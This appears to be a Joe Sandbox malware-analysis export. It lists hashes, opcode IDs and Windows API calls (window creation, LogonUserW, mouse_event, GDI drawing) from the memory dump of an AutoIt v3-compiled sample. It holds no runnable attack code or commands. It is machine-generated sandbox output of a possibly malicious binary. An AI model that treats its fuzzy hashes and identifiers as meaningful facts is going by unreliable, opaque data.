                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 318e5d769ebef2fabf6f2dcf7acd6439551ce5aa07acfa46602aa1c59eb37445
                                                                    • Instruction ID: 9749f5e08931272b569c6de2ab0fafd139a1b32e9d08a42b93eb135f9ccc598e
                                                                    • Opcode Fuzzy Hash: 318e5d769ebef2fabf6f2dcf7acd6439551ce5aa07acfa46602aa1c59eb37445
                                                                    • Instruction Fuzzy Hash: EDB0923105430AABEB102F91E909B8A3F68EB44AA2F408010F64D84066CBEB54508B91
                                                                    Strings
                                                                    • Variable must be of type 'Object'., xrefs: 01013E62
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Variable must be of type 'Object'.
                                                                    • API String ID: 0-109567571
                                                                    • Opcode ID: 09be3aee09f8b42ddc846a3d5b887d519171ff95eaac605563e5e6dd9f4bcff3
                                                                    • Instruction ID: b948b917cc9ad034b5c71f5d1ee7a835e2491186ea4ffbc4f82e5c404dfbc5b8
                                                                    • Opcode Fuzzy Hash: 09be3aee09f8b42ddc846a3d5b887d519171ff95eaac605563e5e6dd9f4bcff3
                                                                    • Instruction Fuzzy Hash: BEA29B75E00205CBCB24EF58C490AAEB7B2FF58324F68805AD9469F355D739ED42EB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4ea8ad4a3954974332cafbfdcc9f2ead1e904a0e7d10cf53e3b751076275b8e2
                                                                    • Instruction ID: 180e4b29c517d128d659c7a0230612a5f79b0f1d89206e04b541820dc1e80c48
                                                                    • Opcode Fuzzy Hash: 4ea8ad4a3954974332cafbfdcc9f2ead1e904a0e7d10cf53e3b751076275b8e2
                                                                    • Instruction Fuzzy Hash: A932F032D29F054DD7339534C872336A248AFB73D8F15D737E95AB5ABAEB2984835200
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cfbfc5897fc5a961a4f6d83b3553d1658f836966d79ee44531c5b5a9f9bb8f73
                                                                    • Instruction ID: 6b99ee05ea5452482335d5ddc54ad36a382d71d72f00c0d8821559431f76c55c
                                                                    • Opcode Fuzzy Hash: cfbfc5897fc5a961a4f6d83b3553d1658f836966d79ee44531c5b5a9f9bb8f73
                                                                    • Instruction Fuzzy Hash: 94B12330E2AF508DD323A6398835336B64CAFBB2C5F51D71BFC9675D66EB2681834240
                                                                    APIs
                                                                    • __time64.LIBCMT ref: 0103889B
                                                                      • Part of subcall function 00FF520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01038F6E,00000000,?,?,?,?,0103911F,00000000,?), ref: 00FF5213
                                                                      • Part of subcall function 00FF520A: __aulldiv.LIBCMT ref: 00FF5233
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                    • String ID:
                                                                    • API String ID: 2893107130-0
                                                                    • Opcode ID: e93233c2c3a5f35b62692009e0af8d1e44d58cdf04d06fc933b28244144c8a74
                                                                    • Instruction ID: 6606e7ebb0c05823cdfc2393c175be00bca654c33767bd9cd54e916a25009ce1
                                                                    • Opcode Fuzzy Hash: e93233c2c3a5f35b62692009e0af8d1e44d58cdf04d06fc933b28244144c8a74
                                                                    • Instruction Fuzzy Hash: C721AF72625610CBC729CF29E451A52B3E5EFA5311F288FADE1F5CB2C0CA39A905CB54
                                                                    APIs
                                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 01034C4A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: mouse_event
                                                                    • String ID:
                                                                    • API String ID: 2434400541-0
                                                                    • Opcode ID: df4d2e6c4cbb2d744c5291c5a6fab7ffed33f9253cdd777b318ed2779518dabc
                                                                    • Instruction ID: 68018834b9c42555b6009b95b05c614085aefe23b8c69ad3b3726aa061aeb829
                                                                    • Opcode Fuzzy Hash: df4d2e6c4cbb2d744c5291c5a6fab7ffed33f9253cdd777b318ed2779518dabc
                                                                    • Instruction Fuzzy Hash: 91D017A517420E68F9EC0A259A2FF7A15CCE380686FC081896281CE1C1A88858408130
                                                                    APIs
                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,01028389), ref: 010287D1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: LogonUser
                                                                    • String ID:
                                                                    • API String ID: 1244722697-0
                                                                    • Opcode ID: 740e41591f62da0644e4ef90406150f6272cce94cc47cdbc3925aab39d1fecff
                                                                    • Instruction ID: eb3a0d6d38a6bc8177134d370b3a6fe214c429ece50c9e88f88ae1a16ebb245c
                                                                    • Opcode Fuzzy Hash: 740e41591f62da0644e4ef90406150f6272cce94cc47cdbc3925aab39d1fecff
                                                                    • Instruction Fuzzy Hash: DED05E3226060EABEF018EA4DC01EAF3B69EB04B01F408111FE15C5090C77AD835AF60
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FFA12A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 16a270f6e82e4bb2e7110b903f30630ef18944159b32d8b186cc9b585f24308a
                                                                    • Instruction ID: 3cd324821c728bfacab9b952046202fdaab9eac246179859342eedec31b16944
                                                                    • Opcode Fuzzy Hash: 16a270f6e82e4bb2e7110b903f30630ef18944159b32d8b186cc9b585f24308a
                                                                    • Instruction Fuzzy Hash: 12A0113000020EAB8B002E82E80888ABFACEA002A0B008020F80C800228BBBA8208A80
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 39ce2fee2afebd5557fbec474e87175a3559582bea3f9286cf8e6ac4bc8cdb3c
                                                                    • Instruction ID: bde707faa119f550a56ace1136f8282c6df34c257fcc07c5bcfdb4de4c507c8c
                                                                    • Opcode Fuzzy Hash: 39ce2fee2afebd5557fbec474e87175a3559582bea3f9286cf8e6ac4bc8cdb3c
                                                                    • Instruction Fuzzy Hash: 1D223A30D041E69BDF38AE1AC8947BC77A1FB01794F288076D9CACB592DB789D82D741
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                    • Instruction ID: 828f84964bb3b5388eb9a8c734729e380799cbd3d0ba8f312089bd15ff522b42
                                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                    • Instruction Fuzzy Hash: 3EC1A7326050974ADF6D863AC47413EFBA16EA27B131E075DD9B3CF1E5EE20C925E620
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                    • Instruction ID: fc1163076a6476605917c1afcce2277d59f689cf10d4f9359c0322cb5443d29e
                                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                    • Instruction Fuzzy Hash: C3C1A2336051974ADF6D463AC47413EFAA16EA27B131A076ED5B3DB1E4EE20C924F620
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                    • Instruction ID: 6909636390c0c3d751931dee37ee810d870c1e821266399ea3afbb09d6ccd4f9
                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                    • Instruction Fuzzy Hash: 15C1A33260519789DF2D463AC47413EFBB17EA27B131A076DD5B3DB2E4EE20C925E620
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 0104785B
                                                                    • DeleteObject.GDI32(00000000), ref: 0104786D
                                                                    • DestroyWindow.USER32 ref: 0104787B
                                                                    • GetDesktopWindow.USER32 ref: 01047895
                                                                    • GetWindowRect.USER32(00000000), ref: 0104789C
                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 010479DD
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 010479ED
                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047A35
                                                                    • GetClientRect.USER32(00000000,?), ref: 01047A41
                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 01047A7B
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047A9D
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047AB0
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047ABB
                                                                    • GlobalLock.KERNEL32(00000000), ref: 01047AC4
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047AD3
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 01047ADC
                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047AE3
                                                                    • GlobalFree.KERNEL32(00000000), ref: 01047AEE
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047B00
                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,01062CAC,00000000), ref: 01047B16
                                                                    • GlobalFree.KERNEL32(00000000), ref: 01047B26
                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 01047B4C
                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 01047B6B
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047B8D
                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047D7A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                    • API String ID: 2211948467-2373415609
                                                                    • Opcode ID: c37a9f2f7a44af660b07ce26ccf52f64249d8207492f02abd13c0819def462d1
                                                                    • Instruction ID: 059c0d53508e58d14c64741c19903a7ab2d1ed33f7d319cf8337aadb31676654
                                                                    • Opcode Fuzzy Hash: c37a9f2f7a44af660b07ce26ccf52f64249d8207492f02abd13c0819def462d1
                                                                    • Instruction Fuzzy Hash: 55027FB5900209AFDB14EFA8DC89EAF7BB9FF49310F048159F955AB290C7799D01CB60
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?,0105F910), ref: 01053627
                                                                    • IsWindowVisible.USER32(?), ref: 0105364B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpperVisibleWindow
                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                    • API String ID: 4105515805-45149045
                                                                    • Opcode ID: 9f386c7f0cb9c41fd0f281d74b4a47f8d1f67c547dceaf0eac63f5700720cf7e
                                                                    • Instruction ID: 3a5ccc5c3553a8a9c818ed4b72322c837300043b8c1af779f108f007dc293c36
                                                                    • Opcode Fuzzy Hash: 9f386c7f0cb9c41fd0f281d74b4a47f8d1f67c547dceaf0eac63f5700720cf7e
                                                                    • Instruction Fuzzy Hash: B0D16B302083059BCB44FF14C955ABFBBE6BF94394F084459EDC25B3A2DB29E90ADB51
                                                                    APIs
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0105A630
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0105A661
                                                                    • GetSysColor.USER32(0000000F), ref: 0105A66D
                                                                    • SetBkColor.GDI32(?,000000FF), ref: 0105A687
                                                                    • SelectObject.GDI32(?,00000000), ref: 0105A696
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0105A6C1
                                                                    • GetSysColor.USER32(00000010), ref: 0105A6C9
                                                                    • CreateSolidBrush.GDI32(00000000), ref: 0105A6D0
                                                                    • FrameRect.USER32(?,?,00000000), ref: 0105A6DF
                                                                    • DeleteObject.GDI32(00000000), ref: 0105A6E6
                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0105A731
                                                                    • FillRect.USER32(?,?,00000000), ref: 0105A763
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0105A78E
                                                                      • Part of subcall function 0105A8CA: GetSysColor.USER32(00000012), ref: 0105A903
                                                                      • Part of subcall function 0105A8CA: SetTextColor.GDI32(?,?), ref: 0105A907
                                                                      • Part of subcall function 0105A8CA: GetSysColorBrush.USER32(0000000F), ref: 0105A91D
                                                                      • Part of subcall function 0105A8CA: GetSysColor.USER32(0000000F), ref: 0105A928
                                                                      • Part of subcall function 0105A8CA: GetSysColor.USER32(00000011), ref: 0105A945
                                                                      • Part of subcall function 0105A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0105A953
                                                                      • Part of subcall function 0105A8CA: SelectObject.GDI32(?,00000000), ref: 0105A964
                                                                      • Part of subcall function 0105A8CA: SetBkColor.GDI32(?,00000000), ref: 0105A96D
                                                                      • Part of subcall function 0105A8CA: SelectObject.GDI32(?,?), ref: 0105A97A
                                                                      • Part of subcall function 0105A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0105A999
                                                                      • Part of subcall function 0105A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0105A9B0
                                                                      • Part of subcall function 0105A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0105A9C5
                                                                      • Part of subcall function 0105A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0105A9ED
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 3521893082-0
                                                                    • Opcode ID: e7f0d924ff3d86e9d35e231a79eb25fcadd114bc4984a584aa8c77acbb083826
                                                                    • Instruction ID: 993d6c7c1ed5b96e9102550cdb8b81664754eb4fbebdb0d115e4373fef776143
                                                                    • Opcode Fuzzy Hash: e7f0d924ff3d86e9d35e231a79eb25fcadd114bc4984a584aa8c77acbb083826
                                                                    • Instruction Fuzzy Hash: 29918D72108306EFDB619F64DC08A5B7BE9FF89325F100B19FAA297190D73AD944CB51
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?,?), ref: 00FD2CA2
                                                                    • DeleteObject.GDI32(00000000), ref: 00FD2CE8
                                                                    • DeleteObject.GDI32(00000000), ref: 00FD2CF3
                                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00FD2CFE
                                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00FD2D09
                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0100C43B
                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0100C474
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0100C89D
                                                                      • Part of subcall function 00FD1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FD2036,?,00000000,?,?,?,?,00FD16CB,00000000,?), ref: 00FD1B9A
                                                                    • SendMessageW.USER32(?,00001053), ref: 0100C8DA
                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0100C8F1
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0100C907
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0100C912
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                    • String ID: 0
                                                                    • API String ID: 464785882-4108050209
                                                                    • Opcode ID: 8bc1f3d2d8a3b2475633f74b10959388fa5f57d320651a02bc3bce04a863623e
                                                                    • Instruction ID: 30f6eb9c07c9104225422f32d1019e7e3b2bf448eaec4275fd7ca4f5b9a48f95
                                                                    • Opcode Fuzzy Hash: 8bc1f3d2d8a3b2475633f74b10959388fa5f57d320651a02bc3bce04a863623e
